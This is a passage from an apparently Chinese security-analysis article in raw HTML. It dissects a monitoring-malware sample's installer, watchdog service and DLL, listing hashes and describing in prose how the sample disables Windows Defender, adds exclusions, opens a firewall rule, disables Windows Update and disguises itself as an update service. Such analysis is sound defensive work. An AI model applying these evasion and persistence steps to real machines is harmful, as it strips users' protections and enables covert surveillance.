normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.1）注册程序</span></span></strong></span></p><table style="width:574px;"><tbody><tr><td data-colwidth="166"><p><span leaf="">MD5</span></p></td><td data-colwidth="408"><p><span leaf="">62565204478f0ef679aafd7c2f5ceae5</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">文件名</span></p></td><td data-colwidth="408"><p><span leaf="">monitorinstaller_update1.exe</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">文件大小</span></p></td><td data-colwidth="408"><p><span leaf="">804.00 KB</span></p></td></tr><tr><td data-colwidth="166"><p><span leaf="">文件类型</span></p></td><td data-colwidth="408"><p><span leaf="">Win64 EXE</span></p></td></tr></tbody></table><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">在执行注册程序后，会弹窗要求输入服务器地址，后续的数据会发送到该地址。</span></span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023877" data-ratio="0.4810606060606061" style="width:574px;height:276px;" data-type="png" data-w="528" src="https://wechat2rss.xlab.app/img-proxy/?k=f7b9b599&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlgcsicTqndppjwbBicY7rn7QeVVRfibbIYMkBN0pg0OFOkymVIT3Gtdkjw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><img data-imgfileid="100023878" class="rich_pages wxw-img" data-ratio="0.8681672025723473" data-type="png" data-w="311" src="https://wechat2rss.xlab.app/img-proxy/?k=c0b3e2d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlOY1ps8qFP3A1PoKyr8LAOhdZI2wHh2wgib1FtXed2KQwLbpE5SCSQ5Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图2 输入服务地址</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;"><span leaf="">为了成功安装监控软件，样本会制定以下规则：</span></span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">禁用Windows Defender的实时监控功能；</span></p></li><li><p><span leaf="">将C:\Windows目录及C:\Windows\explorer.exe文件添加到Windows Defender排除项目；</span></p></li><li><p><span leaf="">在Windows防火墙中创建一条入站规则，允许C:\Windows\explorer.exe程序接收外部网络连接；</span></p></li><li><p><span leaf="">禁用Windows Update服务。</span></p></li></ol><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023879" data-ratio="0.3017341040462428" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=16c9eaad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlicRNqJMicaXwibVHA82TqIm3zEtR7ibtexXoTuIYlIO2EFoms13AiaSaTLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图3 禁用Windows Defender的实时监控</span></span></p><p><span leaf=""><img data-imgfileid="100023880" class="rich_pages wxw-img" data-ratio="0.29826589595375724" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=e1c3f084&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlDzzKGes2LUy7xhB2icteZ6WicibtMnhrvRQPR8W0sYDlaknMuUSOFl61w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图4 添加排除项</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023881" data-ratio="0.26242774566473986" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=d1fd9c49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlJn7eC5zxm5JWibHL0VFpAQPa189WQszeticel4txDeto3Jlv0th9mcpQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图5 建立防火墙规则</span></span></p><p><span leaf=""><img data-imgfileid="100023882" class="rich_pages wxw-img" data-ratio="0.30751445086705204" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ec53b3d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlWeXHgiaMka0Y4DMo5d0p0vrxTOaliaWbxpQoGib9AbTSHicGlFOLeOgD2A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图6 禁用Windows Update服务</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">在建立规则后，从资源中提取文件，并在C:\ProgramData\Microsoft\Services\Updater\目录释放systemui.dll文件，并调用其导出函数DllRegisterServer注册服务(该DLL功能详见下文)。</span></span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023883" data-ratio="0.45895953757225433" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=f1a93807&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGleOEJNO5d2mVPhYjbRcnnePCGdocf8cbxaNMYapwWlFQbekmZnvSwIg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-imgfileid="100023884" class="rich_pages wxw-img" data-ratio="0.3895953757225434" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=5aa5f689&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl7XJZspkCsWgZkd0YibBWjSvhAfWI55tIFGpwVjGic3UxWUEMFpiaH3BicQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图7 释放DLL并注册服务</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;"><span leaf="">样本再次从资源提取文件，获取“WinUpdateService ”程序，并传递“—install”参数，执行注册功能。</span></span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023885" data-ratio="0.3514450867052023" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e477c68c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlPrttZbBl9vpibwhYIOhql1GDXW4G3iadQJT9vjJRDbd6d5lwpHyWuelQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图8 释放守护程序并执行</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;"><span leaf="">在安装完之后重新启动Windows Defender，恢复环境。</span></span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023886" data-ratio="0.3421965317919075" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7307d1e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlibF2e8GoWb3WZnibK6oiaxY8mLD9EicuRoCKecc3ficSr1cibRqL2PicUgyZw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图9 重新启动Windows Defender</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.2）守护进程</span></span></strong></span></p><table style="width:576px;"><tbody><tr><td data-colwidth="160"><p><span leaf="">MD5</span></p></td><td data-colwidth="416"><p><span leaf="">462d434aabc3954076480ff61f299f05</span></p></td></tr><tr><td data-colwidth="160"><p><span leaf="">文件名</span></p></td><td data-colwidth="416"><p><span leaf="">WinUpdateService.exe</span></p></td></tr><tr><td data-colwidth="160"><p><span leaf="">文件大小</span></p></td><td data-colwidth="416"><p><span leaf="">186.00 KB</span></p></td></tr><tr><td data-colwidth="160"><p><span leaf="">文件类型</span></p></td><td data-colwidth="416"><p><span leaf="">Win64 EXE</span></p></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">WinUpdateService程序可以接收一个不同的参数。在接受到“--install”参数后，为自身创建名为WnSvc的服务，伪装成Windows更新服务。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023887" data-ratio="0.5630057803468208" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e97f574c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlibibRz5VawqzzAHy8ecPIZTMRHocJBUAI3PtDZInAINB34aVc1xQibaJQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图10 创建服务</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">图</span><span leaf="">在接收到“--status”参数后，检查TCP连接表中30005端口是否处于监听状态、systemui.dll的加载状态以及是否启动了explorer.exe进程。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023888" data-ratio="0.26473988439306356" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e42e2c59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlBHice2iafTdTF2hksyKFFkria051JpoNIM1S0G8ibyOnrxibxLE8F7OQpsg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图11 状态查看</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在接收到“—repair”参数后,使用管理员权限修复网络，其中需要对程序输入密码“secret@128!@*”。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023889" class="rich_pages wxw-img" data-ratio="0.49710982658959535" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=aad7db3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlYlSgl8yI8sB6ukapOlBWkc4F6wBIucKjfVOHs9sTomWu8e1XcQOZdA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图12 网络修复功能</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在不为WinUpdateService程序提供参数的情况下，样本会启动WnSvc服务，守护explorer.exe进程，并在30005端口处于监听状态以及systemui.dll加载情况下会启动网络，否则禁用网络并结束当前explorer.exe进程。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023890" class="rich_pages wxw-img" data-ratio="0.12023121387283237" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b31dabf2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlcQANkoLZC0dqRguqPnutbkVfZh8kYTwdhTZzvTlKDcek6A4ibNyIHcw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图13 守护explorer.exe进程</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023891" data-ratio="0.34104046242774566" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c87489a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGl2gwHTjTfmMmvNGd7DbNiaxzTgl5SpibwuplicpmEJ6GHxibBbWHXmosGhg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图14 开启网络</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023892" data-ratio="0.4797687861271676" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=3756f635&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGla1mjEbHiauuCJW8ZIp8OtX17Zfjn6SSsrw5KQz1JbVS5LS1gkic5VEdA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图15 关闭网络</span></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3）监控程序</span></span></strong></span></p><table style="width:576px;"><tbody><tr><td data-colwidth="198"><p><span leaf="">MD5</span></p></td><td data-colwidth="378"><p><span leaf="">f3fcff392f44a3b7f0c49b7205c253ea</span></p></td></tr><tr><td data-colwidth="198"><p><span leaf="">文件名</span></p></td><td data-colwidth="378"><p><span leaf="">SystemUIExt.dll</span></p></td></tr><tr><td data-colwidth="198"><p><span leaf="">文件大小</span></p></td><td data-colwidth="378"><p><span leaf="">872.00 KB</span></p></td></tr><tr><td data-colwidth="198"><p><span leaf="">文件类型</span></p></td><td data-colwidth="378"><p><span leaf="">Win64 DLL</span></p></td></tr></tbody></table><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: 